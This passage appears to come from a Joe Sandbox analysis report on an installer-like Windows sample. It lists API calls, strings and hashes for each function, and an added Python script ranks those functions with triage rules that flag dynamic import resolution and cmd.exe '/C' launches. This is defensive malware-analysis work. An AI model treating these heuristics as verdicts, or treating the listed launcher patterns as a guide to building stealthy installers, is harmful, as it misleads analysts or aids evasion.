                                                                                                     • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                    • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                                    • API String ID: 854858120-615399546
                                                                                                    • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                    • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                                    • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                    • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
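The function records above (the GetModuleHandleA/GetProcAddress resolution of Wow64DisableWow64FsRedirection and the COMMAND.COM / cmd.exe "/C" batch launcher with GetExitCodeProcess) are the ones an analyst wants to read first, and the listing format makes that easy to automate. The following Python is an added example, not Joe Sandbox code: it parses the per-function "APIs" and "Similarity" blocks in the format shown on this page and applies a few triage rules. The rule names and conditions, and the ApiCall / FunctionBlock types, are this example's own assumptions; the SAMPLE text is an excerpt of three blocks from the listing above, trimmed to a few lines each. None of the rules is a verdict by itself, since legitimate installers and GUI frameworks trip them too; they only rank which functions to open in IDA first.

```python
"""Triage a Joe Sandbox function listing (the per-function 'APIs' /
'Similarity' blocks shown in this report).  Added example, not Joe Sandbox
code; rule names and conditions are this example's own assumptions."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# API-call lines: "• Api.MODULE(args), ref: ADDR", "• Api.MODULE ref: ADDR"
# (no argument list) and indented "• Part of subcall function ADDR: ..." lines.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
# "• Key: value" lines of the Similarity section (String ID, Opcode ID, ...)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                  # call-site address
    subcall: Optional[str]    # parent address when reported via "Part of subcall function"


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)   # "String ID" split on '$'
    opcode_id: str = ""

    def apis(self):
        """Every API name called directly or through a reported subcall."""
        return {c.api for c in self.calls}


def parse_listing(text):
    """Return one FunctionBlock per 'APIs' header, in listing order."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is None:                      # text before the first 'APIs' header
            continue
        elif (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] is not None else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif (f := FIELD_RE.match(line)) and f["key"] == "String ID":
            cur.strings = f["val"].split("$")
        elif f and f["key"] == "Opcode ID":
            cur.opcode_id = f["val"]
    return blocks


def _has_string(block, *needles):
    return any(n in s for s in block.strings for n in needles)

# Triage rules (assumed, not Joe Sandbox signatures).  Each is a reason to
# read that function first, not a verdict: installers legitimately do all of these.
RULES = [
    ("dynamic-import-resolution",
     lambda b: {"GetModuleHandleA", "GetProcAddress"} <= b.apis()),
    ("wow64-fs-redirection-toggle",
     lambda b: _has_string(b, "Wow64DisableWow64FsRedirection")),
    ("runtime-hardening-imports",
     lambda b: _has_string(b, "SetProcessDEPPolicy", "SetDllDirectoryW", "SetSearchPathMode")),
    ("shell-interpreter-launch",
     lambda b: _has_string(b, 'cmd.exe" /C', 'COMMAND.COM" /C') and "GetExitCodeProcess" in b.apis()),
]


def flag(blocks):
    """Opcode ID -> names of the rules that fired, for blocks that fired any."""
    hits = {}
    for b in blocks:
        fired = [name for name, pred in RULES if pred(b)]
        if fired:
            hits[b.opcode_id] = fired
    return hits


# Constructed input: three blocks excerpted and trimmed from the listing above.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
Similarity
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
  • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
  • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
Similarity
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
APIs
• GetActiveWindow.USER32 ref: 0042F58F
• GetFocus.USER32 ref: 0042F597
Similarity
• String ID: TWindowDisabler-Window
• Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
"""

if __name__ == "__main__":
    for opcode_id, fired in flag(parse_listing(SAMPLE)).items():
        print(opcode_id[:16], ", ".join(fired))
```

Keying the result on the Opcode ID rather than the address is deliberate: the address changes with every rebuild of the sample family, while the Opcode ID is how this report identifies the same function across samples, so the triage output can be compared between reports.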
                                                                                                    APIs
                                                                                                    • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                    • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                    • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$FileIconLoadLowerModuleName
                                                                                                    • String ID: 2$MAINICON
                                                                                                    • API String ID: 3935243913-3181700818
                                                                                                    • Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                                    • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                                    • Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                                    • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                                      • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                                      • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                      • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                      • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                      • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                      • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                      • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                      • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                      • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                      • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                      • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                      • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                      • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                                    • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                    • API String ID: 316262546-2767913252
                                                                                                    • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                    • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                                    • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                    • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                                    APIs
                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                    • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$Prop
                                                                                                    • String ID:
                                                                                                    • API String ID: 3887896539-0
                                                                                                    • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                    • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                                    • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                    • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                                    Strings
                                                                                                    • PendingFileRenameOperations2, xrefs: 00455784
                                                                                                    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                                    • WININIT.INI, xrefs: 004557E4
                                                                                                    • PendingFileRenameOperations, xrefs: 00455754
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                    • API String ID: 47109696-2199428270
                                                                                                    • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                    • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                                    • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                    • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                    • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                                    • API String ID: 1375471231-2952887711
                                                                                                    • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                    • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                                    • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                    • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                                    APIs
                                                                                                    • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                    • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                    • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnumLongWindows
                                                                                                    • String ID: \AB
                                                                                                    • API String ID: 4191631535-3948367934
                                                                                                    • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                    • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                                    • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                    • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                                    APIs
                                                                                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: AddressDeleteHandleModuleProc
                                                                                                    • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                    • API String ID: 588496660-1846899949
                                                                                                    • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                    • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                                    • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                    • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                                    Strings
                                                                                                    • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                                    • NextButtonClick, xrefs: 0046BC4C
                                                                                                    • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                    • API String ID: 0-2329492092
                                                                                                    • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                    • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                                    • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                    • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                                    APIs
                                                                                                    • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                                    • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ActiveChangeNotifyWindow
                                                                                                    • String ID: $Need to restart Windows? %s
                                                                                                    • API String ID: 1160245247-4200181552
                                                                                                    • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                    • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                                    • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                    • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                    • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                                    • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                                    • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                    • String ID: Creating directory: %s
                                                                                                    • API String ID: 2451617938-483064649
                                                                                                    • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                    • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                                    • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                    • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressByteCharMultiProcWide
                                                                                                    • String ID: SfcIsFileProtected$sfc.dll
                                                                                                    • API String ID: 2508298434-591603554
                                                                                                    • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                    • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                                    • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                    • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                    • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                    • RegisterClassA.USER32(?), ref: 004164CE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Class$InfoRegisterUnregister
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3749476976-2766056989
                                                                                                    • Opcode ID: df6e090dea74baa5ac925230d828a7230e5c2d53f0976f0f8597eebaced2b944
                                                                                                    • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                                    • Opcode Fuzzy Hash: df6e090dea74baa5ac925230d828a7230e5c2d53f0976f0f8597eebaced2b944
                                                                                                    • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                                    APIs
                                                                                                    • 75381520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                                    • 75381500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                                    • 75381540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: 753815007538152075381540
                                                                                                    • String ID: %E
                                                                                                    • API String ID: 3367396946-175436132
                                                                                                    • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                    • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                                    • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                    • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0044B401
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectReleaseSelect
